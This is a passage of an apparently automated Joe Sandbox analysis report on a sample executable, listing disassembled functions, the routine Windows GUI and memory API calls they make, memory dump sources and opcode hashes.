                                                                                                                                                                            • Instruction Fuzzy Hash: F441CE72A00204AFDB20EF7CC881A5EB7E5FF89314F1581A9E915EB295DA31ED01DB91
                                                                                                                                                                            Function 008C41CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetInputState.USER32 ref: 008C4225
                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 008C427C
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 008C42A5
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 008C42AF
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C42C0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2256411358-0
                                                                                                                                                                            • Opcode ID: 9a17ff8177f55035dce3df2873b0ed8b77dee6cebaaa6d7f9980fb0b29179a70
                                                                                                                                                                            • Instruction ID: 0059cbfb3711d37395e9c54169608261c4ab8b6f205b5936d48764d1a2c94b2b
                                                                                                                                                                            • Opcode Fuzzy Hash: 9a17ff8177f55035dce3df2873b0ed8b77dee6cebaaa6d7f9980fb0b29179a70
                                                                                                                                                                            • Instruction Fuzzy Hash: F031A270918385AEEB34CB74AC6AFB637B8FB11308F04156DE466C61A1D7B4D8C9DB21
                                                                                                                                                                            Function 008B2191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008B21A5
                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 008B2251
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 008B2259
                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 008B226A
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 008B2272
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                            • Opcode ID: 91518fc2ad4eb8f44b8248e991519d84634997e1496d752cf070bce20f794612
                                                                                                                                                                            • Instruction ID: 1b011e8405dd814aa49abe7a9fe4e95ce90ee7a18c83b8157ba75afed8807b44
                                                                                                                                                                            • Opcode Fuzzy Hash: 91518fc2ad4eb8f44b8248e991519d84634997e1496d752cf070bce20f794612
                                                                                                                                                                            • Instruction Fuzzy Hash: 24319C72900259EFDB14CFA8DD89ADE7BB5FB14315F104229FA25EB2E0C770A954CB90
                                                                                                                                                                            Function 008E6065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 008E60A4
                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 008E60FC
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E610E
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E6119
                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008E6175
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                            • Opcode ID: 4c7178462da4d5ccac3849206f2cce33989b49e53f2bb03f31f0e776e143a146
                                                                                                                                                                            • Instruction ID: 2c82b39b7d0745c65ce283f68bb0e630d41cad3c739d8fe3c8afe60ec82eae87
                                                                                                                                                                            • Opcode Fuzzy Hash: 4c7178462da4d5ccac3849206f2cce33989b49e53f2bb03f31f0e776e143a146
                                                                                                                                                                            • Instruction Fuzzy Hash: C921D53190429CABCF119FA5CC849EE7BB8FF56368F008216FA25DA185E770C585CF50
                                                                                                                                                                            Function 008B089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?,?,008B0BEE), ref: 008B08BB
                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?), ref: 008B08D6
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?), ref: 008B08E4
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?), ref: 008B08F4
                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?), ref: 008B0900
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                            • Opcode ID: 8b755897ecf0df89653944dd1bbb13e916f343199f7e31173c1ab577cd559506
                                                                                                                                                                            • Instruction ID: 7c9b4c76311e65f542f647a6aac2b95907ffe93370a6d18789acca1ed3a1f00c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b755897ecf0df89653944dd1bbb13e916f343199f7e31173c1ab577cd559506
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B018F72600318AFDB114F64DC44BAB7ABDFB48791F204434F905DA321E771DE008BA0
                                                                                                                                                                            Function 008C0BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0BE0
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0BED
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0BFA
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0C07
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0C14
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0C21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: f9b9a58bd6eba73107fd93a71e82fe05d09a3950dea58ade0574f243382a9056
                                                                                                                                                                            • Instruction ID: f6929d0c07d64ab6c3be83709026b4d89ba59fabafa9bc2554af847c97362a29
                                                                                                                                                                            • Opcode Fuzzy Hash: f9b9a58bd6eba73107fd93a71e82fe05d09a3950dea58ade0574f243382a9056
                                                                                                                                                                            • Instruction Fuzzy Hash: 3101AE75800B16DFCB30AF66D980816FBF9FF503593158A3ED1A292931C7B1A989CF80
                                                                                                                                                                            Function 008B64D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 008B64E7
                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 008B64FE
                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 008B6516
                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 008B6532
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008B654C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                            • Opcode ID: 9fb21f67156bf608f5271f824d8bb64887343d81465e32316bb91d312b7f6e25
                                                                                                                                                                            • Instruction ID: 7f1d70747e13671d6300da1abe9c8c4c9940eaa4aed576922b6ab9f56d527c94
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fb21f67156bf608f5271f824d8bb64887343d81465e32316bb91d312b7f6e25
                                                                                                                                                                            • Instruction Fuzzy Hash: B3018630500708ABEB305B54DD8EBD67778FB10705F000559B587A50E1EBF4AAA8CB90
                                                                                                                                                                            Function 00882630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 0088264E
                                                                                                                                                                              • Part of subcall function 00882D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4), ref: 00882D6E
                                                                                                                                                                              • Part of subcall function 00882D58: GetLastError.KERNEL32(00921DC4,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4,00921DC4), ref: 00882D80
                                                                                                                                                                            • _free.LIBCMT ref: 00882660
                                                                                                                                                                            • _free.LIBCMT ref: 00882673
                                                                                                                                                                            • _free.LIBCMT ref: 00882684
                                                                                                                                                                            • _free.LIBCMT ref: 00882695
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 4edbb8f353aea821c0104cae62c3b31852c557b05488f33c0bbe514542259345
                                                                                                                                                                            • Instruction ID: c1e1b76f4c2dee68f4325846e9532d91bbb14a5f90df3a3641ab5e8f99977628
                                                                                                                                                                            • Opcode Fuzzy Hash: 4edbb8f353aea821c0104cae62c3b31852c557b05488f33c0bbe514542259345
                                                                                                                                                                            • Instruction Fuzzy Hash: F0F0DA7092A2249BC726BF5CBE058883BA4FB28751305864AF434D6275C7720953BF85
                                                                                                                                                                            Function 008BCA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008BCAC6
                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 008BCB0C
                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00922990,00FF57C0), ref: 008BCB55
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                            • Opcode ID: 34ef8e36a90e4fb74b3ec040d424a0cfce3d6c6004172254fd0825841a53cf48
                                                                                                                                                                            • Instruction ID: fe8d7aea331b1a2364b4bb75f267da0effb54d78c54bbfa992601e1c5f1ec1a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 34ef8e36a90e4fb74b3ec040d424a0cfce3d6c6004172254fd0825841a53cf48
                                                                                                                                                                            • Instruction Fuzzy Hash: D6418C702093419FD720DF28C886F9ABBE8FF94324F14461DE9A5D7392D730A904CBA2
                                                                                                                                                                            Function 008E4817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008E489F
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008E48B3
                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008E48D7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                            • Opcode ID: eabb7672c8a42dd1b684252f83de89962a6c36b0167843bcebaf6778a5e83119
                                                                                                                                                                            • Instruction ID: 31aa0547fc7ed20e4329316e153d5ddf73a5cccf2c981d9ba3573afd56363204
                                                                                                                                                                            • Opcode Fuzzy Hash: eabb7672c8a42dd1b684252f83de89962a6c36b0167843bcebaf6778a5e83119
                                                                                                                                                                            • Instruction Fuzzy Hash: 1521D332600269BFDF218F94CC86FEA3B65FF49714F110124FA19AB1D0D6B1A8559B90
                                                                                                                                                                            Function 008E4116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008E419F
                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008E41AF
                                                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008E41D5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                            • Opcode ID: 55083dd11923295f2975a1b43116bb9fd37b2d93813b7bc767133b90de920879
                                                                                                                                                                            • Instruction ID: 0a54de7cfab1e26c4e8bf137349f22cb13185d059f11489bf1e02f1af575fd79
                                                                                                                                                                            • Opcode Fuzzy Hash: 55083dd11923295f2975a1b43116bb9fd37b2d93813b7bc767133b90de920879
                                                                                                                                                                            • Instruction Fuzzy Hash: E421D132610258BBEF218F55DC84EEB376EFF9A754F118124FA08DB190C6719C9287A0
                                                                                                                                                                            Function 008E4B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008E4BAE
                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008E4BC3
                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008E4BD0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                            • Opcode ID: 0837afdac495151eb961d1f7ca7aa6105002a55b1e01682ef6eda6e3b984a851
                                                                                                                                                                            • Instruction ID: 55e6218a55bf2cdb0e90fe33b32aec5647acbbcf8ed8babf6e1b779b225af61f
                                                                                                                                                                            • Opcode Fuzzy Hash: 0837afdac495151eb961d1f7ca7aa6105002a55b1e01682ef6eda6e3b984a851
                                                                                                                                                                            • Instruction Fuzzy Hash: 15110631240248BEEF215FA9CC46FAB77A8FFC6B64F114514FA59E60A0D671DC619B20
                                                                                                                                                                            Function 008E61E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E6220
                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E624D
                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 008E625C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                            • Opcode ID: 333f6d8dcf123104118efc012fea4b227a24c1fdef7c93c673ef0ea029f80359
                                                                                                                                                                            • Instruction ID: 67df54d46548611d563c0f4246abc4f5851ec3a55ad4b802e9e77b8a837c4418
                                                                                                                                                                            • Opcode Fuzzy Hash: 333f6d8dcf123104118efc012fea4b227a24c1fdef7c93c673ef0ea029f80359
                                                                                                                                                                            • Instruction Fuzzy Hash: DD01A971604288EFDB209F56CC88BAE7BB4FF46355F0480A9F949DA150DB308994EF31
                                                                                                                                                                            Function 008B090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4ef78c85cecb26d2e8134cea27d855deb5daddacbb6c2d61016b868ef4853628
                                                                                                                                                                            • Instruction ID: aa0f75afdd33a3fd2043d3bf2634ba79c26f8f06303d5ec259bb806ab2300be9
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef78c85cecb26d2e8134cea27d855deb5daddacbb6c2d61016b868ef4853628
